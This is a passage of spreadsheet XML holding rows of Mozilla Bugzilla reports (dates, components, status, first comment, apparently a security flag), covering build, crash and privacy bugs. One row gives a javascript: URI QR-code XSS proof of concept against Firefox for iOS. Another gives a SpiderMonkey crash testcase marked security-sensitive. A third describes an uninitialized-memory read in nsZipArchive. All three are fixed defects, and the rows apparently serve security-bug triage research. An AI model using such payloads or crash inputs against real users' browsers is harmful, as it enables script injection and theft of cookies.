      <c r="M2333" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2333" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2333" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2333" t="inlineStr"/>
      <c r="Q2333" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2333" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2333" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2333" t="n">
        <v>1</v>
      </c>
      <c r="U2333" t="n">
        <v>0</v>
      </c>
      <c r="V2333" t="n">
        <v>7</v>
      </c>
      <c r="W2333" t="inlineStr">
        <is>
          <t>starting around 15:12 GMT mozilla-taskcluster started reporting issues with posting to the /jobs endpoint for all projects it's monitoring.  The endpoint returns a 400 status code.
This causes jobs to not appear on treeherder staging, but as a side effect mozilla-taskcluster might also not be posting jobs to prod until the stage pushes occur (still investigating that)</t>
        </is>
      </c>
      <c r="X2333" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2334">
      <c r="A2334" t="n">
        <v>450519</v>
      </c>
      <c r="B2334" t="inlineStr">
        <is>
          <t>2008-08-13 18:23:36 -0700</t>
        </is>
      </c>
      <c r="C2334" t="inlineStr">
        <is>
          <t>No breakpad reports since comm-central move</t>
        </is>
      </c>
      <c r="D2334" t="inlineStr">
        <is>
          <t>2008-08-28 05:05:52 -0700</t>
        </is>
      </c>
      <c r="E2334" t="n">
        <v>1</v>
      </c>
      <c r="F2334" t="n">
        <v>1</v>
      </c>
      <c r="G2334" t="n">
        <v>2</v>
      </c>
      <c r="H2334" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2334" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J2334" t="inlineStr">
        <is>
          <t>Build Config</t>
        </is>
      </c>
      <c r="K2334" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2334" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2334" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2334" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2334" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2334" t="inlineStr"/>
      <c r="Q2334" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2334" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2334" t="inlineStr">
        <is>
          <t>Thunderbird 3.0a3</t>
        </is>
      </c>
      <c r="T2334" t="n">
        <v>1</v>
      </c>
      <c r="U2334" t="n">
        <v>0</v>
      </c>
      <c r="V2334" t="n">
        <v>6</v>
      </c>
      <c r="W2334" t="inlineStr">
        <is>
          <t>STR:
 Force a crash (pick your poison, my favorite is playing a wav file with the VLC plugin)
 Breakpad dialog does not appear, goes directly to Microsoft crash dialog.
The last crashes that I have logged were:
004ec9a3-50eb-11dd-acc2-0013211cbf8a	7/13/2008	10:50 AM
21a65b9e-4a8d-11dd-8750-001a4bd43e5c	7/5/2008	8:23 AM
Which I believe were due to the same issue.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1a2pre) Gecko/20080813031200 Shredder/3.0b1pre ID:20080813031200</t>
        </is>
      </c>
      <c r="X2334" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2335">
      <c r="A2335" t="n">
        <v>1639590</v>
      </c>
      <c r="B2335" t="inlineStr">
        <is>
          <t>2020-05-20 07:39:54 -0700</t>
        </is>
      </c>
      <c r="C2335" t="inlineStr">
        <is>
          <t>Fix GetOwnPropertyPure</t>
        </is>
      </c>
      <c r="D2335" t="inlineStr">
        <is>
          <t>2020-12-18 17:20:50 -0800</t>
        </is>
      </c>
      <c r="E2335" t="n">
        <v>1</v>
      </c>
      <c r="F2335" t="n">
        <v>1</v>
      </c>
      <c r="G2335" t="n">
        <v>3</v>
      </c>
      <c r="H2335" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2335" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2335" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2335" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2335" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2335" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2335" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2335" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2335" t="inlineStr">
        <is>
          <t>[adv-main77+][adv-esr68.9+][post-critsmash-triage][sec-survey]</t>
        </is>
      </c>
      <c r="Q2335" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2335" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2335" t="inlineStr">
        <is>
          <t>mozilla78</t>
        </is>
      </c>
      <c r="T2335" t="n">
        <v>1</v>
      </c>
      <c r="U2335" t="n">
        <v>0</v>
      </c>
      <c r="V2335" t="n">
        <v>12</v>
      </c>
      <c r="W2335" t="inlineStr">
        <is>
          <t>In bug 1620193 we fixed a mistake that crept in during unboxed objects removal, where we didn't check that an object was native before calling as&lt;NativeObject&gt; on it. (Fortunately proxy objects couldn't reach that point, so it only affected typed objects, which are nightly-only.)
That patch was flagged in a mozregression for bug 1638706. I've convinced myself that the mozregression was wrong, but while I was staring at this code I noticed that there was a second instance of the same bug in the following function.
Like bug 1620193, this bug should only affect nightly.</t>
        </is>
      </c>
      <c r="X2335" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2336">
      <c r="A2336" t="n">
        <v>423790</v>
      </c>
      <c r="B2336" t="inlineStr">
        <is>
          <t>2008-03-18 19:07:21 -0700</t>
        </is>
      </c>
      <c r="C2336" t="inlineStr">
        <is>
          <t>Phishing Backoff not working with 400s</t>
        </is>
      </c>
      <c r="D2336" t="inlineStr">
        <is>
          <t>2014-05-27 12:25:31 -0700</t>
        </is>
      </c>
      <c r="E2336" t="n">
        <v>1</v>
      </c>
      <c r="F2336" t="n">
        <v>1</v>
      </c>
      <c r="G2336" t="n">
        <v>3</v>
      </c>
      <c r="H2336" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2336" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2336" t="inlineStr">
        <is>
          <t>Safe Browsing</t>
        </is>
      </c>
      <c r="K2336" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2336" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2336" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2336" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2336" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2336" t="inlineStr"/>
      <c r="Q2336" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2336" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2336" t="inlineStr">
        <is>
          <t>Firefox 3 beta5</t>
        </is>
      </c>
      <c r="T2336" t="n">
        <v>1</v>
      </c>
      <c r="U2336" t="n">
        <v>0</v>
      </c>
      <c r="V2336" t="n">
        <v>11</v>
      </c>
      <c r="W2336" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
Build Identifier: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
If the phishing server returns 400's, Firefox will make the request every minute, instead of just making 3 requests, and then backing off for an hour.
Reproducible: Always
Steps to Reproduce:
1. Have server return 400.</t>
        </is>
      </c>
      <c r="X2336" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2337">
      <c r="A2337" t="n">
        <v>1205707</v>
      </c>
      <c r="B2337" t="inlineStr">
        <is>
          <t>2015-09-17 08:31:36 -0700</t>
        </is>
      </c>
      <c r="C2337" t="inlineStr">
        <is>
          <t>Assertion failure: this-&gt;is&lt;T&gt;(), at js/src/jsobj.h:553</t>
        </is>
      </c>
      <c r="D2337" t="inlineStr">
        <is>
          <t>2016-07-02 11:18:36 -0700</t>
        </is>
      </c>
      <c r="E2337" t="n">
        <v>1</v>
      </c>
      <c r="F2337" t="n">
        <v>1</v>
      </c>
      <c r="G2337" t="n">
        <v>3</v>
      </c>
      <c r="H2337" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2337" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2337" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2337" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2337" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2337" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2337" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2337" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2337" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q2337" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2337" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2337" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T2337" t="n">
        <v>1</v>
      </c>
      <c r="U2337" t="n">
        <v>0</v>
      </c>
      <c r="V2337" t="n">
        <v>26</v>
      </c>
      <c r="W2337" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision e7d613b3bcfe (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug, run with --fuzzing-safe --no-threads --ion-eager --ion-extra-checks):
function callCatch(f) {
    try {
        f();
    } catch (exc) {}
};
constructor = Int8Array;
var join = newGlobal()[constructor.name].prototype.join;
join.call(new constructor([1, 2, 3]), " ")
var invalidReceivers = [ constructor, new Proxy(new constructor(), {})];
invalidReceivers.forEach(invalidReceiver =&gt; {
  callCatch(() =&gt; { constructor.prototype.join.call(invalidReceiver); })
});
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x000000000045d922 in JSObject::as&lt;js::SharedTypedArrayObject&gt; (this=&lt;optimized out&gt;) at js/src/jsobj.h:553
#0  0x000000000045d922 in JSObject::as&lt;js::SharedTypedArrayObject&gt; (this=&lt;optimized out&gt;) at js/src/jsobj.h:553
#1  0x0000000000941d51 in as&lt;js::SharedTypedArrayObject&gt; (this=&lt;optimized out&gt;) at js/src/vm/SharedTypedArrayObject.h:112
#2  AnyTypedArrayViewData (obj=&lt;optimized out&gt;) at js/src/vm/TypedArrayCommon.h:113
#3  js::jit::IonBuilder::addTypedArrayLengthAndData (this=this@entry=0x7fffffff8f60, obj=0x7ffff69a5c00, checking=checking@entry=js::jit::IonBuilder::SkipBoundsCheck, index=index@entry=0x0, length=length@entry=0x7fffffff8a68, elements=elements@entry=0x0) at js/src/jit/IonBuilder.cpp:9087
#4  0x00000000009f9bfe in addTypedArrayLength (obj=&lt;optimized out&gt;, this=0x7fffffff8f60) at js/src/jit/IonBuilder.h:631
#5  js::jit::IonBuilder::inlineTypedArrayLength (this=0x7fffffff8f60, callInfo=...) at js/src/jit/MCallOptimize.cpp:2180
#6  0x000000000099ab5d in js::jit::IonBuilder::inlineSingleCall (this=0x7fffffff8f60, callInfo=..., targetArg=&lt;optimized out&gt;) at js/src/jit/IonBuilder.cpp:5439
#7  0x000000000099c47c in js::jit::IonBuilder::inlineCallsite (this=this@entry=0x7fffffff8f60, targets=..., callInfo=...) at js/src/jit/IonBuilder.cpp:5503
#8  0x000000000099c80d in js::jit::IonBuilder::jsop_call (this=this@entry=0x7fffffff8f60, argc=1, constructing=&lt;optimized out&gt;) at js/src/jit/IonBuilder.cpp:6381
#9  0x00000000009953eb in js::jit::IonBuilder::inspectOpcode (this=this@entry=0x7fffffff8f60, op=op@entry=JSOP_CALL) at js/src/jit/IonBuilder.cpp:1839
#10 0x0000000000996540 in js::jit::IonBuilder::traverseBytecode (this=this@entry=0x7fffffff8f60) at js/src/jit/IonBuilder.cpp:1501
#11 0x000000000099a046 in js::jit::IonBuilder::buildInline (this=this@entry=0x7fffffff8f60, callerBuilder=callerBuilder@entry=0x7fffffff9c00, callerResumePoint=callerResumePoint@entry=0x7ffff69a5cd8, callInfo=...) at js/src/jit/IonBuilder.cpp:1071
#12 0x000000000099a575 in js::jit::IonBuilder::inlineScriptedCall (this=this@entry=0x7fffffff9c00, callInfo=..., target=target@entry=0x7ffff7e7c2e0) at js/src/jit/IonBuilder.cpp:4941
#13 0x000000000099d4ae in js::jit::IonBuilder::jsop_funcall (this=this@entry=0x7fffffff9c00, argc=0) at js/src/jit/IonBuilder.cpp:6204
#14 0x0000000000995a68 in js::jit::IonBuilder::inspectOpcode (this=this@entry=0x7fffffff9c00, op=op@entry=JSOP_FUNCALL) at js/src/jit/IonBuilder.cpp:1832
#15 0x0000000000996540 in js::jit::IonBuilder::traverseBytecode (this=this@entry=0x7fffffff9c00) at js/src/jit/IonBuilder.cpp:1501
#16 0x000000000099a046 in js::jit::IonBuilder::buildInline (this=this@entry=0x7fffffff9c00, callerBuilder=callerBuilder@entry=0x7ffff69a31a8, callerResumePoint=callerResumePoint@entry=0x7ffff69a4be0, callInfo=...) at js/src/jit/IonBuilder.cpp:1071
#17 0x000000000099a575 in js::jit::IonBuilder::inlineScriptedCall (this=this@entry=0x7ffff69a31a8, callInfo=..., target=&lt;optimized out&gt;) at js/src/jit/IonBuilder.cpp:4941
#18 0x000000000099ab40 in js::jit::IonBuilder::inlineSingleCall (this=0x7ffff69a31a8, callInfo=..., targetArg=&lt;optimized out&gt;) at js/src/jit/IonBuilder.cpp:5447
#19 0x000000000099c47c in js::jit::IonBuilder::inlineCallsite (this=this@entry=0x7ffff69a31a8, targets=..., callInfo=...) at js/src/jit/IonBuilder.cpp:5503
#20 0x000000000099c80d in js::jit::IonBuilder::jsop_call (this=this@entry=0x7ffff69a31a8, argc=0, constructing=&lt;optimized out&gt;) at js/src/jit/IonBuilder.cpp:6381
#21 0x00000000009953eb in js::jit::IonBuilder::inspectOpcode (this=this@entry=0x7ffff69a31a8, op=op@entry=JSOP_CALL) at js/src/jit/IonBuilder.cpp:1839
#22 0x0000000000996540 in js::jit::IonBuilder::traverseBytecode (this=this@entry=0x7ffff69a31a8) at js/src/jit/IonBuilder.cpp:1501
#23 0x0000000000996985 in js::jit::IonBuilder::build (this=0x7ffff69a31a8) at js/src/jit/IonBuilder.cpp:900
#24 0x00000000009977b1 in js::jit::IonCompile (cx=cx@entry=0x7ffff6907000, script=script@entry=0x7ffff7e62570, baselineFrame=baselineFrame@entry=0x0, osrPc=&lt;optimized out&gt;, constructing=&lt;optimized out&gt;, recompile=&lt;optimized out&gt;, optimizationLevel=optimizationLevel@entry=js::jit::Optimization_Normal) at js/src/jit/Ion.cpp:2171
#25 0x000000000099f3da in js::jit::Compile (cx=cx@entry=0x7ffff6907000, script=..., script@entry=..., osrFrame=osrFrame@entry=0x0, osrPc=osrPc@entry=0x0, constructing=&lt;optimized out&gt;, forceRecompile=forceRecompile@entry=false) at js/src/jit/Ion.cpp:2402
#26 0x000000000099f5db in js::jit::CanEnter (cx=cx@entry=0x7ffff6907000, state=...) at js/src/jit/Ion.cpp:2561
#27 0x000000000069f9dd in js::RunScript (cx=cx@entry=0x7ffff6907000, state=...) at js/src/vm/Interpreter.cpp:680
#28 0x00000000006a01d5 in js::Invoke (cx=cx@entry=0x7ffff6907000, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:781
#29 0x00000000006a1e1d in js::Invoke (cx=cx@entry=0x7ffff6907000, thisv=..., fval=..., argc=argc@entry=1, argv=argv@entry=0x7fffffffb428, rval=..., rval@entry=...) at js/src/vm/Interpreter.cpp:818
#30 0x00000000008f1f5b in js::jit::DoCallFallback (cx=0x7ffff6907000, frame=0x7fffffffb468, stub_=&lt;optimized out&gt;, argc=&lt;optimized out&gt;, vp=0x7fffffffb418, res=...) at js/src/jit/BaselineIC.cpp:8899
#31 0x00007ffff7feef9f in ?? ()
[...]
#53 0x0000000000000000 in ?? ()
rax	0x0	0
rbx	0x7ffff69a5c00	140737330699264
rcx	0x7ffff6ca53b0	140737333842864
rdx	0x0	0
rsi	0x7ffff6f7a9d0	140737336814032
rdi	0x7ffff6f791c0	140737336807872
rbp	0x7fffffff89d0	140737488325072
rsp	0x7fffffff89d0	140737488325072
r8	0x7ffff7fe0780	140737354008448
r9	0x6372732f736a2f6c	7165916604736876396
r10	0x7fffffff8790	140737488324496
r11	0x7ffff6c27960	140737333328224
r12	0x7fffffff8f60	140737488326496
r13	0x0	0
r14	0x0	0
r15	0x0	0
rip	0x45d922 &lt;JSObject::as&lt;js::SharedTypedArrayObject&gt;() const+28&gt;
=&gt; 0x45d922 &lt;JSObject::as&lt;js::SharedTypedArrayObject&gt;() const+28&gt;:	movl   $0x229,0x0
   0x45d92d &lt;JSObject::as&lt;js::SharedTypedArrayObject&gt;() const+39&gt;:	callq  0x4982c0 &lt;abort()&gt;
Marked s-s because this assertion is known to be associated with security problems.</t>
        </is>
      </c>
      <c r="X2337" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2338">
      <c r="A2338" t="n">
        <v>1175920</v>
      </c>
      <c r="B2338" t="inlineStr">
        <is>
          <t>2015-06-18 07:38:51 -0700</t>
        </is>
      </c>
      <c r="C2338" t="inlineStr">
        <is>
          <t>Add a checkbox to the in-content Privacy preferences to toggle TP in Private Browsing</t>
        </is>
      </c>
      <c r="D2338" t="inlineStr">
        <is>
          <t>2016-05-10 09:12:35 -0700</t>
        </is>
      </c>
      <c r="E2338" t="n">
        <v>1</v>
      </c>
      <c r="F2338" t="n">
        <v>1</v>
      </c>
      <c r="G2338" t="n">
        <v>2</v>
      </c>
      <c r="H2338" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2338" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2338" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2338" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2338" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2338" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2338" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2338" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2338" t="inlineStr">
        <is>
          <t>[fxprivacy] [campaign]</t>
        </is>
      </c>
      <c r="Q2338" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2338" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2338" t="inlineStr">
        <is>
          <t>Firefox 42</t>
        </is>
      </c>
      <c r="T2338" t="n">
        <v>1</v>
      </c>
      <c r="U2338" t="n">
        <v>0</v>
      </c>
      <c r="V2338" t="n">
        <v>28</v>
      </c>
      <c r="W2338" t="inlineStr">
        <is>
          <t>Created attachment 8624241
pref.jpg
When toggling the feature off, TP no longer runs on new pages.  I'm assuming that pages that have already been blocked will still require a manual reload to remove TP.
When toggling the feature on, TP runs on non-exempt pages.  I'm assuming that pages that have already been loaded (without blocking) will still require a manual reload to get TP to work.</t>
        </is>
      </c>
      <c r="X2338" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2339">
      <c r="A2339" t="n">
        <v>1567118</v>
      </c>
      <c r="B2339" t="inlineStr">
        <is>
          <t>2019-07-18 03:59:22 -0700</t>
        </is>
      </c>
      <c r="C2339" t="inlineStr">
        <is>
          <t>Improper parsing of QR codes in address bar leads to XSS</t>
        </is>
      </c>
      <c r="D2339" t="inlineStr">
        <is>
          <t>2024-05-30 10:01:08 -0700</t>
        </is>
      </c>
      <c r="E2339" t="n">
        <v>1</v>
      </c>
      <c r="F2339" t="n">
        <v>1</v>
      </c>
      <c r="G2339" t="n">
        <v>2</v>
      </c>
      <c r="H2339" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2339" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J2339" t="inlineStr">
        <is>
          <t>Browser</t>
        </is>
      </c>
      <c r="K2339" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2339" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2339" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N2339" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2339" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2339" t="inlineStr">
        <is>
          <t>[fixed by bug 1588928]</t>
        </is>
      </c>
      <c r="Q2339" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2339" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2339" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2339" t="n">
        <v>1</v>
      </c>
      <c r="U2339" t="n">
        <v>0</v>
      </c>
      <c r="V2339" t="n">
        <v>14</v>
      </c>
      <c r="W2339" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Steps to reproduce:
1. Goto URL https://www.the-qrcode-generator.com/
2. Click on tab `free text`
3. Paste the following exploit to generate QR code
---------------------------------------------------------
javascript:fetch('https://www.google.com/').then(res=&gt;res.text()).then(data=&gt;alert(data));
---------------------------------------------------------
4. Open firefox and scan the QR code generated by the website
5. You will triage javascript code execution in reference to google.com
Video POC: https://drive.google.com/file/d/1G71vasB7MYSUClXDmsx5gV_dYFnLn1Mt/view
Actual results:
This results in stealing users current cookies and data on the current domain by just scanning the QR
Expected results:
javascript URI's should not be allowed, or some kind of warning message should be displayed.</t>
        </is>
      </c>
      <c r="X2339" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2340">
      <c r="A2340" t="n">
        <v>473713</v>
      </c>
      <c r="B2340" t="inlineStr">
        <is>
          <t>2009-01-14 23:22:54 -0800</t>
        </is>
      </c>
      <c r="C2340" t="inlineStr">
        <is>
          <t>qm-pubuntu-try01 needs a thumping</t>
        </is>
      </c>
      <c r="D2340" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2340" t="n">
        <v>1</v>
      </c>
      <c r="F2340" t="n">
        <v>1</v>
      </c>
      <c r="G2340" t="n">
        <v>5</v>
      </c>
      <c r="H2340" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2340" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2340" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2340" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2340" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2340" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2340" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2340" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2340" t="inlineStr"/>
      <c r="Q2340" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2340" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2340" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2340" t="n">
        <v>1</v>
      </c>
      <c r="U2340" t="n">
        <v>0</v>
      </c>
      <c r="V2340" t="n">
        <v>5</v>
      </c>
      <c r="W2340" t="inlineStr">
        <is>
          <t>"Linux talos try trunk" has been dying with "failed to initialize browser" since 2009/01/13 14:34.</t>
        </is>
      </c>
      <c r="X2340" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2341">
      <c r="A2341" t="n">
        <v>1214782</v>
      </c>
      <c r="B2341" t="inlineStr">
        <is>
          <t>2015-10-14 11:09:12 -0700</t>
        </is>
      </c>
      <c r="C2341" t="inlineStr">
        <is>
          <t>Latent wild-pointer/bounds bug in nsZipArchive</t>
        </is>
      </c>
      <c r="D2341" t="inlineStr">
        <is>
          <t>2024-05-30 09:06:20 -0700</t>
        </is>
      </c>
      <c r="E2341" t="n">
        <v>1</v>
      </c>
      <c r="F2341" t="n">
        <v>1</v>
      </c>
      <c r="G2341" t="n">
        <v>3</v>
      </c>
      <c r="H2341" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2341" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2341" t="inlineStr">
        <is>
          <t>Networking: JAR</t>
        </is>
      </c>
      <c r="K2341" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L2341" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2341" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2341" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2341" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2341" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main44+]</t>
        </is>
      </c>
      <c r="Q2341" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2341" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2341" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T2341" t="n">
        <v>1</v>
      </c>
      <c r="U2341" t="n">
        <v>0</v>
      </c>
      <c r="V2341" t="n">
        <v>15</v>
      </c>
      <c r="W2341" t="inlineStr">
        <is>
          <t>Class nsZipArchive (modules\libjar\nsZipArchive.cpp) does not initialize its mCommentPtr and mCommentLen fields unless the archive contains a valid comment. Further, nsZipArchive::GetComment uses mCommentPtr and mCommentLen without checking whether the archive contains a valid comment. Thus, it can return a comment string containing data from memory that it has no right to access, potentially leaking sensitive data from one context into another:
850: bool nsZipArchive::GetComment(nsACString &amp;aComment)
851: {
852: MOZ_WIN_MEM_TRY_BEGIN
853:   aComment.Assign(mCommentPtr, mCommentLen);
854: MOZ_WIN_MEM_TRY_CATCH(return false)
855:   return true;
856: }
At present, this bug appears to be latent, or nearly so, because GetComment's only caller is StartupCache::LoadArchive (startupcache\StartupCache.cpp), and (as far as I know) the startup cache stream is trusted, so it should contain a valid comment. Presumably there might not be a valid comment if the cache file became corrupted, or if a cache file having a different format were restored from a backup, in which case LoadArchive might be affected:
240: nsresult
241: StartupCache::LoadArchive(enum TelemetrifyAge flag)
242: {
...
253:   rv = mArchive-&gt;OpenArchive(mFile);
254:   if (NS_FAILED(rv) || flag == IGNORE_AGE)
255:     return rv;
256:
257:   nsCString comment;
258:   if (!mArchive-&gt;GetComment(comment)) {
259:     return rv;
260:   }
261:
262:   const char *data;
263:   size_t len = NS_CStringGetData(comment, &amp;data);
264:   PRTime creationStamp;
265:   // We might not have a comment if the startup cache file was created
266:   // before we started recording creation times in the comment.
267:   if (len == sizeof(creationStamp)) {
268:     memcpy(&amp;creationStamp, data, len);
...</t>
        </is>
      </c>
      <c r="X2341" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2342">
      <c r="A2342" t="n">
        <v>329196</v>
      </c>
      <c r="B2342" t="inlineStr">
        <is>
          <t>2006-03-02 20:40:38 -0800</t>
        </is>
      </c>
      <c r="C2342" t="inlineStr">
        <is>
          <t>Release/News Announcement for Bugzilla 2.20.2, 2.22, and 2.23.1</t>
        </is>
      </c>
      <c r="D2342" t="inlineStr">
        <is>
          <t>2006-04-22 22:21:51 -0700</t>
        </is>
      </c>
      <c r="E2342" t="n">
        <v>1</v>
      </c>
      <c r="F2342" t="n">
        <v>1</v>
      </c>
      <c r="G2342" t="n">
        <v>4</v>
      </c>
      <c r="H2342" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2342" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2342" t="inlineStr">
        <is>
          <t>bugzilla.org</t>
        </is>
      </c>
      <c r="K2342" t="inlineStr">
        <is>
          <t>2.22</t>
        </is>
      </c>
      <c r="L2342" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2342" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2342" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
